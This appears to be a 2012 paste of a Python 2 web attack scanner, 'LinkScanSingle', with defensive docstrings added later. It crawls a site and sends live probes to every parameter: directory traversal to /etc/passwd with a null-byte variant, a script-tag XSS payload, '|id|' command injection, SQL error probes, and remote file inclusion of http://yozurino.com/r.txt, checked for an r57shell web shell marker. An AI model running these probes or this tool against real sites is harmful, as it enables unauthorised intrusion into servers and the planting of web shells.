Googleinurl

LinkScanSingle LFI,XSS,RFI,SQL,CMD injection

Sep 7th, 2012
  1. #!/usr/bin/python
  2. #LinkScanSingle will take a site and
  3. #collect links from the source. If the link
  4. #contains a = it checks LFI,XSS,RFI,SQL,CMD injection
  5. #searching source (simple)
  6.  
  7. #If you're going to use a different shell than the
  8. #one I have supplied, you will need to change line
  9. #54 (r57shell) to something in your shell source.
  10.  
  11. from sgmllib import SGMLParser
  12. import sys, urllib, httplib, re, urllib2, sets, socket
  13.  
  # Give every socket created after this point a 5-second default timeout,
  # so a probe request against an unresponsive host is abandoned quickly.
  socket.setdefaulttimeout(5)
  15.  
  class URLLister(SGMLParser):
      """Link harvester: records the href of every <a> tag it is fed.

      After feed()/close(), ``self.urls`` holds the raw href strings in the
      order they were parsed, duplicates included.
      """

      def reset(self):
          # SGMLParser.__init__ calls reset(), so the list exists before the
          # first feed().
          SGMLParser.reset(self)
          self.urls = []

      def start_a(self, attrs):
          # attrs is the list of (name, value) pairs of one <a> tag; anchors
          # without an href contribute nothing.
          for name, value in attrs:
              if name == 'href':
                  self.urls.append(value)
  25.  
  def parse_urls(links):
      """Turn harvested hrefs into de-duplicated "...param=" URL prefixes.

      Every link containing at least one "=" yields one candidate per "=":
      the link is cut immediately after that "=", which drops the parameter
      value and anything following it. The caller appends a test string to
      each prefix. Links without "=" are ignored.

      Reads the module-level ``site`` (the normalised base URL); nothing is
      passed in for it. Order of the returned list is whatever sets.Set
      produces.
      """
      found = []
      for link in links:
          equals = link.count("=")
          if equals <= 0:
              continue
          # cut = 1 keeps everything up to the last "=", cut = 2 up to the
          # one before it, and so on.
          for cut in xrange(1, equals + 1):
              prefix = link.rsplit("=", cut)[0] + "="
              # Site-relative hrefs are anchored on the base URL.
              if link[0] in ("/", "?"):
                  url = site + prefix
              else:
                  url = prefix
              # Anything not mentioning the part of ``site`` after its first
              # "." is treated as relative and prefixed as well.
              if site.split(".", 1)[1] not in url:
                  url = site + url
              # Collapse one doubled slash after the scheme.
              # NOTE(review): url[7:] assumes the string starts with the
              # 7-character "http://" -- confirm for other schemes.
              if url.count("//") > 1:
                  url = "http://" + url[7:].replace("//", "/", 1)
              found.append(url)
      return list(sets.Set(found))
  44.          
  def main(host):
      """Run the five checks (XSS, LFI, RFI, CMD, SQL) against one URL prefix.

      ``host`` is a URL ending in "=", as produced by parse_urls(). The checks
      run in a fixed order and each one sends its own request(s).

      urllib2.HTTPError / urllib2.URLError raised by a check are discarded
      without output, so an HTTP error response to a probe (for instance a
      filter answering with an error status) leaves no trace in the report.
      Any other exception propagates to the caller.
      """
      print "\n\t[+] Testing:",host,"\n"
      checks = (
          ("[+] Checking XSS", xss),
          ("[+] Checking LFI", lfi),
          ("[+] Checking RFI", rfi),
          ("[+] Checking CMD", cmd),
          ("[+] Checking SQL", sql),
      )
      for banner, check in checks:
          try:
              if verbose == 1:
                  print banner
              check(host)
          except (urllib2.HTTPError, urllib2.URLError), msg:
              # Deliberately silent, as in the original.
              pass
  82.  
  def rfi(host):
      """Remote-file-inclusion check: request host+RFI and look for a marker.

      The parameter value becomes the external URL held in ``RFI``; a hit is
      reported when the response body contains the literal "r57shell", i.e.
      when the server appears to have fetched and included the remote file.

      Defensive reading: the request carries a full "http://" URL as a
      parameter value, which is easy to match in access logs or a WAF rule.
      The condition itself is closed by never building include paths from
      request data (allow-list them) and, on PHP, keeping allow_url_include
      disabled.
      """
      target = host + RFI
      try:
          body = urllib2.urlopen(target).read()
          if re.search("r57shell", body) is None:
              if verbose == 1:
                  print "[-] Not Vuln."
          else:
              print "[+] RFI:", target
      except (), msg:
          # NOTE(review): an empty tuple matches no exception, so this handler
          # never runs; errors propagate to main(), which drops
          # HTTPError/URLError.
          pass
  95.  
  def xss(host):
      """Reflected-XSS check: request host+XSS and grep the body for "XSS".

      The test is only a search for the three letters "XSS" anywhere in the
      response. It does not verify that the <script> element came back
      unencoded, so a page that merely contains the word, or that echoes the
      value HTML-escaped, is still reported.

      Defensive reading: context-aware output encoding of reflected
      parameters is the fix; the URL-encoded script tag in the query string
      is the log signature.
      """
      probe_url = host + XSS
      page = urllib2.urlopen(probe_url).read()
      if re.search("XSS", page) is None:
          if verbose == 1:
              print "[-] Not Vuln."
      else:
          print "[!] XSS:", probe_url
  103.      
  def sql(host):
      """Error-based SQL check: one request per entry in ``SQL``.

      A hit is reported when the response contains the literal "Warning:"
      (the prefix PHP uses for displayed runtime warnings). The string can
      appear in ordinary page text, so hits are unconfirmed.

      Defensive reading: parameterised queries remove the flaw; turning off
      error display in production removes the signal this check relies on,
      but not the flaw.
      """
      for payload in SQL:
          probe_url = host + payload
          body = urllib2.urlopen(probe_url).read()
          if re.search("Warning:", body) is None:
              if verbose == 1:
                  print "[-] Not Vuln."
          else:
              print "[!] SQL:", probe_url
  112.      
  def cmd(host):
      """Command-injection check: request host+CMD and grep the body for "uid=".

      ``CMD`` wraps ``id`` in pipe characters; "uid=" is how that command's
      output begins. The match is a plain substring search, so any page that
      contains "uid=" (for example inside a link) is reported as well.

      Defensive reading: pipe characters in parameter values are the log
      signature; the fix is to keep request data out of shell command lines
      (argument vectors, no shell) and to validate against an allow-list.
      """
      probe_url = host + CMD
      body = urllib2.urlopen(probe_url).read()
      if re.search("uid=", body) is None:
          if verbose == 1:
              print "[-] Not Vuln."
      else:
          print "[!] CMD:", probe_url
  120.  
  def lfi(host):
      """Local-file-inclusion check: two requests, plain and with "%00".

      Both requests put the directory-traversal path in ``LFI`` into the
      parameter; the second appends an encoded null byte. A hit is reported
      when the response contains "root:", the usual start of /etc/passwd.

      Defensive reading: runs of "../" and a trailing "%00" in a parameter
      are the log signature. Resolving the requested path and checking it
      stays inside an allowed directory, or mapping parameters to a fixed
      set of files, closes the condition.
      """
      attempts = (
          (host + LFI, "[-] Not Vuln."),
          (host + LFI + "%00", "[-] Not Vuln. w/  Null Byte"),
      )
      for probe_url, miss_message in attempts:
          body = urllib2.urlopen(probe_url).read()
          if re.search("root:", body) is None:
              if verbose == 1:
                  print miss_message
          else:
              print "[!] LFI:", probe_url
  135.      
  # ---- Script entry: banner, argument check, payload table, crawl, probe ----
  print "\n\t   d3hydr8[at]gmail[dot]com LinkScanSingle v1.3"
  print "\t-------------------------------------------------\n"
           
  # Exactly one or two arguments are accepted: the site and an optional flag.
  if len(sys.argv) not in [2,3]:
     print "Usage : ./linkscan.py <site> [option]"
     print "Ex: ./linkscan.py http://www.google.com -verbose"
     print "\n\t[Option]"
     print "\t\t-verbose/-v | Verbose Output\n"
     sys.exit(1)
     
  # Test strings appended to each "...param=" prefix by the check functions.
  # They are fixed literals, so the same strings show up verbatim in the
  # request lines of any server this script is run against -- useful as
  # log/WAF match patterns.
  # LFI: directory traversal to /etc/passwd (lfi() also retries with "%00").
  LFI = "../../../../../../../../../../../../etc/passwd"
  # RFI: external URL the target is expected to fetch; rfi() looks for the
  # marker "r57shell" in the response (see the header comment).
  RFI = "http://yozurino.com/r.txt?"
  # NOTE(review): RFI_TITLE is not referenced anywhere in the visible code.
  RFI_TITLE = "Target"
  # XSS: URL-encoded '"<script>alert('XSS')</script>'.
  XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"
  # CMD: the `id` command between pipe characters.
  CMD = "|id|"
  SQL = ["-1","999999"] #Add more or change sql payloads
     
  site = sys.argv[1].replace("\n","")
  print "\n[+] Collecting:",site
  # NOTE(review): if a second argument is present but is neither "-v" nor
  # "-verbose", no exception is raised and `verbose` is never assigned; the
  # first `verbose == 1` in main() then raises NameError, which main() does
  # not catch.
  try:
     if sys.argv[2].lower() == "-v" or sys.argv[2].lower() == "-verbose":
        verbose = 1
        print "[+] Verbose Mode On\n"
  except(IndexError):
     print "[-] Verbose Mode Off\n"
     verbose = 0
     pass
  # Normalise to "http://<host[/dir]>/": strip the scheme, drop whatever
  # follows the last "/", lower-case everything, then put "http://" back.
  # NOTE(review): only "http://" is stripped; an "https://" argument keeps its
  # scheme text and gets "http://" prepended on top of it.
  site = site.replace("http://","").rsplit("/",1)[0]+"/"
  site = "http://"+site.lower()
  # Fetch the start page once and harvest its <a href> values. The page is
  # lower-cased before parsing, so the collected links are lower-case too.
  try:
     usock = urllib.urlopen(site)
     parser = URLLister()
     parser.feed(usock.read().lower())
     parser.close()
     usock.close()
  except(IOError, urllib2.URLError), msg:
     print "[-] Error Connecting to",site
     print "[-]",msg
     sys.exit(1)
  urls = parse_urls(parser.urls)
  print "[+] Links Found:",len(urls)
  # One main() call per parameter prefix; each call sends several probe
  # requests. KeyboardInterrupt is swallowed per URL, so Ctrl-C skips to the
  # next prefix instead of ending the run.
  for url in urls:
     try:
        main(url)
     except(KeyboardInterrupt):
        pass
  print "\n[-] Done\n"